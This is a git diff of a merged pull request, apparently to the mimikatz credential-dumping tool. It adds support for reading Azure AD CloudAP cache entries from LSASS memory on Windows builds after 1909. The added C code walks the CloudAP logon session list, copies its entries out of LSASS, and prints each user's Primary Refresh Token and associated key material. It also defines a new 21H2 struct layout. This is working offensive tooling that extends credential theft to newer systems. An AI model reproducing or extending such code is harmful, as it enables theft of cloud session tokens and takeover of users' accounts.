Merge pull request #400 from dmb2168/master
cloudap support for versions > 1909
This commit is contained in:
commit
a2271237d1
|
@ -29,15 +29,58 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])
|
||||||
|
|
||||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||||
{
|
{
|
||||||
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
|
|
||||||
KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
|
KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
|
||||||
KIWI_CLOUDAP_CACHE_UNK unk;
|
KIWI_CLOUDAP_CACHE_UNK unk;
|
||||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||||
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
|
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
|
||||||
|
|
||||||
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
|
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
|
||||||
{
|
{
|
||||||
aLsassMemory.address = CloudApGlobalLogonSessionList;
|
aLsassMemory.address = CloudApGlobalLogonSessionList;
|
||||||
|
if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
|
||||||
|
{
|
||||||
|
KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
|
||||||
|
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||||
|
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
|
||||||
|
{
|
||||||
|
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
|
||||||
|
{
|
||||||
|
if(logon.cacheEntry)
|
||||||
|
{
|
||||||
|
aLocalMemory.address = &cache;
|
||||||
|
aLsassMemory.address = logon.cacheEntry;
|
||||||
|
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
|
||||||
|
{
|
||||||
|
kprintf(L"\n\t Cachedir : %s", cache.toname);
|
||||||
|
if(cache.cbPRT && cache.PRT)
|
||||||
|
{
|
||||||
|
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
|
||||||
|
creds.UserName.Buffer = (PWSTR) cache.PRT;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(cache.toDetermine)
|
||||||
|
{
|
||||||
|
aLocalMemory.address = &unk;
|
||||||
|
aLsassMemory.address = cache.toDetermine;
|
||||||
|
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
|
||||||
|
{
|
||||||
|
kprintf(L"\n\t Key GUID : ");
|
||||||
|
kull_m_string_displayGUID(&unk.guid);
|
||||||
|
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
|
||||||
|
creds.Password.Buffer = (PWSTR) unk.unk;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
|
||||||
|
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||||
{
|
{
|
||||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
|
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
|
||||||
|
@ -72,5 +115,6 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
}
|
||||||
} else kprintf(L"KO");
|
} else kprintf(L"KO");
|
||||||
}
|
}
|
|
@ -91,3 +91,17 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
|
||||||
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
||||||
// ...
|
// ...
|
||||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
|
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
|
||||||
|
|
||||||
|
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
|
||||||
|
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
|
||||||
|
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
|
||||||
|
DWORD unk0;
|
||||||
|
DWORD unk1;
|
||||||
|
DWORD unk2;
|
||||||
|
LUID LocallyUniqueIdentifier;
|
||||||
|
DWORD unk3;
|
||||||
|
DWORD64 unk4;
|
||||||
|
DWORD64 unk5;
|
||||||
|
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
||||||
|
// ...
|
||||||
|
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;
|
Loading…
Reference in New Issue